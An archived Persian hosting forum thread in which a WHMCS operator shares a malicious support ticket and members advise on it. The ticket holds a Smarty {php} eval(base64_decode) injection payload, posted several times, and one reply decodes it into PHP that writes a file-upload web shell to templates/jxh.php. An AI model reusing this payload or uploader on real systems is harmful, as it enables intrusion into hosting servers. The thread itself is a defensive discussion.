PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : یکی از تیکت های ارسال شده برای من!


navidahwaz
July 12th, 2012, 13:50
سلام
امروز با تیکتی مواجه شدم که محتویاتش این بود!
#939233 - {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

احتمال داره قصد ایجاد کدهای مخرب و هک کردن رو داشته باشن؟!
HyperServer
July 12th, 2012, 14:09
سلام
امروز با تیکتی مواجه شدم که محتویاتش این بود!
#939233 - {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

احتمال داره قصد ایجاد کدهای مخرب و هک کردن رو داشته باشن؟!

100%
navidahwaz
July 12th, 2012, 14:24
باید چکار کنم؟!
در سایت من بدون عضویت هم میشه تیکت زد و به این صورت تیکت زدن!
چکار کنم که فقط عضو ها بتونن تیکت بزنن؟
porya_spy
July 12th, 2012, 14:36
با این کد یک اپلودر روی هاست شما ایجاد میشه و از طریق اون شل اپلود میشه و ادامه کار

پچ این باگ در همین انجمن موجوده
AvestaNetworks
July 12th, 2012, 15:25
سلام.

اطمینان حاصل کنید که به آخرین ورژن از WHMCS ارتقا دادید و در غیر این صورت خطر Exploit شدن سیستم شما را تحدید می کند.

پیشنهاد می شود به هیچ عنوان از ورژن Null شده استفاده نکنید که به طور 100% هک خواهید شد و اگر در اینترنت جستجو کنید این مورد به وفور مشاهده شده است.

با تشکر.
sina_mech
July 12th, 2012, 15:31
سلام
امروز با تیکتی مواجه شدم که محتویاتش این بود!
#939233 - {php}eval(base64_decode('jgnvzgugpsbiyxnlnjrfzgvjb 2rlkcjqrdl3yuhbtkntvmphrzhnsnp4bwizsnrjr0zqzedsdmj qmgljauj0wlhsb2iyutljbkj2yznraulhvnvzm1i1y0dvoultm tfisfjwy0dgewrdow1im0p0tfdsagrhrwljrzvoyldvouluvnd irzlowkdweulpqnbardbpzfhcc2iyrmtawelpugljn0rrcgxzm mh2sunjogfxnxdkwffnzehsd1pumglabwxzwlnjz2jtrnravdb pwm1sc1ptswdjmmw2wlqwau5uqwlqanhwym5cmwrdqnvzvzfsu fnkzmryqnnjauiwzvhcbfbtsnpkv0p0yvhraulhbgtqu0pmzfh cc0lpqjjzv3gxwlqwavzyqnnimkzrswo0oewywnzjbtarsnpzt kntbg1lq0frwdfcufuxumjkmtkxy0d3blhtqtlqu0fpvlhcc2i yrmtjaufwsuhztknnbhbaawhbwti5d2vtz2tymfpkvevwvfd5z g1hv3hssjexykozunrjrjl1wvcxbeoxmhnjq1jmumtstvjwtmj kmlpwykdvblhwc25ibuz0wlnkzetta2dleujswtjodkldyzhza jvwy0d4dllxuwdvmvzmvtbwveldrwhjvhd2wwo0oflusstqr0p 5ugljn0lime5dz2xsykhobelic2dav05vynlbblbhsstwwejzy jjga0lfzejsmeznsunfaelud3zzajq4ww5jk1bhsnlqawm3sug wtknume5dajgriik7dqokzm8gpsbmb3blbigidgvtcgxhdgvzl 2p4ac5wahailcj3iik7dqpmd3jpdguojgzvlcrjb2rlktt=')) ;{/php})

احتمال داره قصد ایجاد کدهای مخرب و هک کردن رو داشته باشن؟!



فقط حواستون باشه که از داخل whmcs این جور تیکت رو باز نکنید! اگر براتون ایمیل هم میشه، مستقیم از بخش تیکت، این تیکت رو قبل از باز کردن پاک کنید.
Arna
July 12th, 2012, 15:44
1. تیکت رو پاک کنید
2. آی پی ارسال کننده ی تیکت رو در whmcs بن کنید
navidahwaz
July 12th, 2012, 15:53
سلام.

اطمینان حاصل کنید که به آخرین ورژن از WHMCS ارتقا دادید و در غیر این صورت خطر Exploit شدن سیستم شما را تحدید می کند.

پیشنهاد می شود به هیچ عنوان از ورژن Null شده استفاده نکنید که به طور 100% هک خواهید شد و اگر در اینترنت جستجو کنید این مورد به وفور مشاهده شده است.

با تشکر.

لایسنس دارم
آخرین ورژن رو نصب کردم
تیکتش رو هم باز کردم!
از چه راهی میشه تشخیص داد توی هاست ما شل هست یا نه؟!
navidahwaz
July 12th, 2012, 15:55
بگید که چطور میشه فقط کسانی که توی سایت عضو هستن بتونن تیکت بزنن؟
sina_mech
July 12th, 2012, 15:56
اگر ورژنتون 5.0.3 بوده، پچ مورد نظر قبلاً روی این ورژن اعمال شده
sarwhost
July 12th, 2012, 16:16
با سلام

فقط حواستون باشه که از داخل whmcs این جور تیکت رو باز نکنید! اگر براتون ایمیل هم میشه، مستقیم از بخش تیکت، این تیکت رو قبل از باز کردن پاک کنید.
این تیکت وقتی میفرستن اپلودر در هاست ایجاد میشه چه باز کنه چه نکنه به مهض فرستادن اپلودر ایجاد خواهد شد
متاسفانه دوستان خوب راهنمایی نکردن این هک در عرض 5 دقیقه هست یعنی شما تا بفهمید تیکت اومده هکر شل ریخته و هک کرده البته خیلی کم پیدا میشه در جا هک کنه برا خودش دسرسی میسازه برا روز مبادا و دیفیس کردن حتی سرور
اگه از نسخه نال استفاده میکنید یا نمیکنید باید امنیت تو whmcs کامل انجام بدید
باز اگه سوالی بود میتونیدتماس بگیرید
واگه قادر به انجام نیستید میتونیم براتون انجام بدیم
navidahwaz
July 12th, 2012, 16:18
ایمیل ارسال کننده رو هم بن کردم آی پی رو باید از کجا مسدود کنم؟
وقتی میزنم مسدود کردن فرستنده مینویسه:


به روزرساني کنترل اسپم موفق بود
آدرس ايميل به ليست ايميل هاي مسدود شده اضافه شد.



188.55.66.249
دومین تیکت
60.48.136.25
ایمیلش
sa@git.sa
mimi@gmail.com
navidahwaz
July 12th, 2012, 16:21
چک کردم نسخه من بروز نبود!

نسخه شما
5.0.3

آخرين نسخه
5.1.2
sardarn
July 12th, 2012, 16:42
این کار قدیمی شده.نسخه شما هم پچ شده هست اما بهتره آپگرید کنید
mohammad8711
July 12th, 2012, 17:17
قبلا روزی 7-8 تا از این تیکت ها داشتیم!
آی پی چند کشور مثل عریستان و ویتنام و هند و ... رو با فایروال بستیم تعداد این تیکت ها خیلی کمتر شده
با کدی که شما گذاشتید جوجه هـکر تلاش داشته یک فایل آپلودر در این مسیر بسازه که احتمالا موفق هم نشده: templates/jxh.php
navidahwaz
July 12th, 2012, 17:24
قبلا روزی 7-8 تا از این تیکت ها داشتیم!
آی پی چند کشور مثل عریستان و ویتنام و هند و ... رو با فایروال بستیم تعداد این تیکت ها خیلی کمتر شده
با کدی که شما گذاشتید جوجه هـکر تلاش داشته یک فایل آپلودر در این مسیر بسازه که احتمالا موفق هم نشده: templates/jxh.php

در دایرکتوری templates فایلی تحت عنوان jxh.php وجود ندارد
Metalik
July 13th, 2012, 09:24
دیکودش این طوری می شه:



$code =
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}'
$fo = fopen("templates/jxh.php","w");
fwrite($fo,$code);


یه آپلودر می سازه و می تونه هر فایلی رو که خواست روی هاست آپلود کنه
mehrshad.ho
July 13th, 2012, 10:19
روزی 20 تا از این تیکت ها ما هم داریم